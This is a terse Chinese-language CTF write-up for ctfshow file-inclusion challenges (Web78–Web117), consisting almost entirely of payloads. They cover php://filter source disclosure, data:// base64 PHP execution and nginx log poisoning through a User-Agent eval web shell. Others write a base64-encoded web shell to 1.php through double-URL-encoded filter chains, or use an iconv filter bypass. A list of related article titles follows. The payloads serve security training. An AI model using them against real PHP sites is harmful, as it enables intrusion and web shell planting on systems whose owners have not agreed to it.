文件包涵漏洞(ctfshow 无条件竞争)

Web78

payload:

?file=php://filter/read=convert.base64-encode/resource=flag.php

Web79

<?php system('cat flag.php');

Data协议写入内容读取

payload:

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

Web80

?file=/var/log/nginx/access.log

文件包含nignx日志文件

User-Agent: <?php eval($_POST[1]);?>

1=system(ls);

1=system('tac fl0g.php');

Web81

绕过php

?file=/var/log/nginx/access.log

文件包含nignx日志文件

User-Agent: <?=eval($_POST[1]);?>

1=system(ls);

1=system('tac fl0g.php');

Web87

Payload:

?file=php://filter/write=convert.base64-decode/resource=1.php 并且进行两次url编码

复制代码
Payload:

?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30

再对posy上传的content二次base64加密

content=<?php @eval($_POST[1]);?>

content=UEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VV3pGZEtUcy9QZz09

访问1.php

1=system(ls);

1=system('tac fl0g.php');

Web88

Data为协议:

<?php system('cat fl0g.php'); ?>

Base64加密后:

PD9waHAgc3lzdGVtKCdjYXQgZmwwZy5waHAnKTsgPz4

payload:?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmwwZy5waHAnKTsgPz4

Web116

环境损坏

Web117

?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=2.php

contents=?<hp pe@av(l_$OPTSa[aa]a;)>?

aaaa=system("tac f*");

相关推荐
终焉暴龙王4 小时前
CTFHub web进阶 php Bypass disable_function通关攻略
开发语言·安全·web安全·php
qq_4309085712 小时前
网络安全-机遇与挑战
安全
安 当 加 密18 小时前
守护汽车“空中升级“:基于HSM/KMS的安全OTA固件签名与验证方案
安全·汽车
大咖分享课1 天前
多租户系统中的安全隔离机制设计
人工智能·安全·安全隔离
荔枝吻1 天前
软件异常读写威胁硬盘安全:从过往案例到防护之道
安全·硬盘
小马爱打代码1 天前
Spring Boot 接口安全设计:接口限流、防重放攻击、签名验证
网络·spring boot·安全
北极光SD-WAN组网1 天前
工业互联网时代,如何通过混合SD-WAN提升煤炭行业智能化网络安全
网络·安全·web安全
深圳安锐科技有限公司1 天前
基坑渗压数据不准?选对渗压计能实现自动化精准监测吗?
安全·自动化·自动化监测·大坝监测·渗压计
Arwen3031 天前
解密国密 SSL 证书:SM2、SM3、SM4 算法的协同安全效应
算法·安全·ssl
dingzd951 天前
通过 Web3 区块链安全评估,领先应对网络威胁
安全·web3·区块链·facebook·tiktok·instagram·clonbrowser